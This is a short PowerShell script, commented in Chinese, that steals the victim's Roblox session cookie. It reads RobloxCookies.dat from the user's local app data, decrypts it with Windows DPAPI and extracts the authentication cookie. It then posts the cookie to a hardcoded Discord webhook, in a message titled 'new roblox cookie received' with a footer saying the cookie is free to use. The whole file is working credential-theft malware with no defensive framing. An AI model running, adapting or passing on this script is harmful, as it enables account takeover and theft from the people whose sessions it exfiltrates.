$OutputEncoding = [System.Text.Encoding]::UTF8

# 1. 取得token
$p="$env:LocalAppData\Roblox\LocalStorage\RobloxCookies.dat"; if(Test-Path $p){ [void][Reflection.Assembly]::LoadWithPartialName('System.Security'); $j=(Get-Content $p -Raw|ConvertFrom-Json).CookiesData; $d=[Security.Cryptography.ProtectedData]::Unprotect([Convert]::FromBase64String($j),$null,'CurrentUser'); $s=[Text.Encoding]::UTF8.GetString($d); if($s -match '(_\|WARNING.*?)(;|$)'){$cookie=$matches[1]; $cookie} }else{"Roblox Not Found"}

# 2. 定義 Webhook URL
$uri = "https://discord.com/api/webhooks/1501523254404190209/qnfTbYgfNuOCOBbEQwuMHHHYCltqgM8iQkpCy0NFTaS14oRmKqfysIQKthauw4YFgGez"

# 3. 準備要發送的資料 (使用自定義物件)
$payload = @{
    embeds = @(
        @{
            title = "新的roblox cookie接收"
            color = 3447003 # 藍色 (十進位)
            
            # 自定義欄位 (可多組)
            fields = @(
                @{
                    name = "cookie"
                    value = "```$cookie```"
                }
            )

            footer = @{
                text = "可以盡情使用"
            }
        }
    )
}

# 4. 將物件轉換為 JSON 並強制轉換為 UTF-8 位元組
$jsonPayload = $payload | ConvertTo-Json -Depth 10 -Compress

# 將字串轉換為 UTF-8 Byte Array (解決亂碼的核心)
$bytePayload = [System.Text.Encoding]::UTF8.GetBytes($jsonPayload)

# 發送請求
Invoke-RestMethod -Uri $uri -Method Post -Body $bytePayload -ContentType "application/json"